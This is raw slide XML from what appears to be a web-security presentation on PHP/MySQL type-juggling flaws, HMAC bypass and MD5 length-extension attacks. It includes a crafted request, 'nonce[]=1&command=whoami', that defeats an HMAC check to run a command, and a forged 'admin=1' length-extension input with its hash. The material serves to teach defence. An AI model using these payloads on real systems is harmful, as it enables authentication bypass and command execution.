                <a:t>nonce[]=1&amp;command=whoami&amp;hmac=aad475b35ab3cd1c0435aabed92890e3890a2e04a45322c584098e488d644baf</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="198" name="nonce[]=1&amp;command=whoami&amp;hmac=aad475b35ab3cd1c0435aabed92890e3890a2e04a45322c584098e488d644baf" descr="nonce[]=1&amp;command=whoami&amp;hmac=aad475b35ab3cd1c0435aabed92890e3890a2e04a45322c584098e488d644baf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="12794536" cy="147320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HP / *JavaScript / *Python…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="1193800"/>
            <a:ext cx="11430000" cy="8032509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="257808" indent="-257808" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="22098" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>PHP / *JavaScript / *Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="515619" indent="-257808" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2000">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="22098" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>ALWAYS use the type comparison ===</a:t>
            </a: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‘anything’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int(0)</a:t>
            </a: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‘anything’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bool(1)</a:t>
            </a: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‘0e1’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘0e99999999’</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF767A"/>
              </a:solidFill>
            </a:endParaRP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‘5cans’ </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 5</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF767A"/>
              </a:solidFill>
            </a:endParaRP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 </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="515619" indent="-257808" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2000">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="22098" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Parameters might be arrays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="257808" indent="-257808" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="22098" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="515619" indent="-257808" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2000">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="22098" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Almost anything can be JavaScript…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="257808" indent="-257808" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="22098" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>M ySQL:</a:t>
            </a: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‘Any String’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="515619" indent="-257808" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2000">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="22098" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_binary</a:t>
            </a:r>
            <a:r>
              <a:t> to force case comparison </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="515619" indent="-257808" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="22098" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>‘12efcca’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // length shortening</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Cliff Notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4160164" y="90366"/>
            <a:ext cx="4684472" cy="1192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C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cliff Notes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MD5, SHA1, SHA2, others……"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33572" y="174436"/>
            <a:ext cx="12937656" cy="8604628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="101600" dist="25400" dir="5400000">
              <a:srgbClr val="000000">
                <a:alpha val="32823"/>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MD5, SHA1, SHA2, others…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="2160">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="DIN Alternate"/>
                <a:ea typeface="DIN Alternate"/>
                <a:cs typeface="DIN Alternate"/>
                <a:sym typeface="DIN Alternate"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Based on Merkle–Damgård construction </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>designed</a:t>
            </a:r>
            <a:r>
              <a:t> in 1979</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="2160">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="DIN Alternate"/>
                <a:ea typeface="DIN Alternate"/>
                <a:cs typeface="DIN Alternate"/>
                <a:sym typeface="DIN Alternate"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Vulnerable to length extension attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="2160">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="DIN Alternate"/>
                <a:ea typeface="DIN Alternate"/>
                <a:cs typeface="DIN Alternate"/>
                <a:sym typeface="DIN Alternate"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>MD5 Initialization Vector: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x67452301EFCDAB8998BADCFE10325476</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>MD5 Pad Size:</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>56 byte data + 8 byte bit length</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="l">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="CED6D6"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Stronger algorithms have larger avalanche effects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="l">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="CED6D6"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Strict Avalanche Criterion (SAC) for each input bit change each output bit has a 50% probity of changing.</a:t>
            </a:r>
            <a:br/>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>SHA3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="2160">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="DIN Alternate"/>
                <a:ea typeface="DIN Alternate"/>
                <a:cs typeface="DIN Alternate"/>
                <a:sym typeface="DIN Alternate"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Based on sponge construction </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>released</a:t>
            </a:r>
            <a:r>
              <a:t> by NIST in 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="2160">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="DIN Alternate"/>
                <a:ea typeface="DIN Alternate"/>
                <a:cs typeface="DIN Alternate"/>
                <a:sym typeface="DIN Alternate"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>NOT Vulnerable to length extension attacks</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId2" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Avalanche_effect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Merkle–Damgård_construction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/SHA-3</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MD5 Hash Examples…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310151" y="210092"/>
            <a:ext cx="12384498" cy="93207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MD5 Hash Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="American Typewriter"/>
                <a:ea typeface="American Typewriter"/>
                <a:cs typeface="American Typewriter"/>
                <a:sym typeface="American Typewriter"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="American Typewriter"/>
                <a:ea typeface="American Typewriter"/>
                <a:cs typeface="American Typewriter"/>
                <a:sym typeface="American Typewriter"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>’’ + 56 bytes of padding + 8 bytes length (0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2600">
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘’</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="939999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d41d8cd98f00b204e9800998ecf8427e</a:t>
            </a:r>
            <a:br>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="C2CACA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>‘a’ + 55 bytes of padding + 8 bytes of length (8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2600">
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘a’</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="939999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0cc175b9c0f1b6a831c399e269772661</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="C2CACA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2300">
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="C2CACA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2300">
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="C2CACA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>24 bytes data 31 bytes padding + 8 bytes length (192)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2300">
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘secret:admin=0&amp;name=cory’ </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="939999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d47404ef0aa6a190cc2c37f730c771fb</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F7FEFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2300">
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret:admin=0&amp;name=cory</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;admin=1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="939999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>06cdb2a2f974c868fe23888fa9d6beb8</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:defRPr sz="1360">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0000  73 65 63 72 65 74 64 61  74 61 80 00 00 00 00 00  secretdata……</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
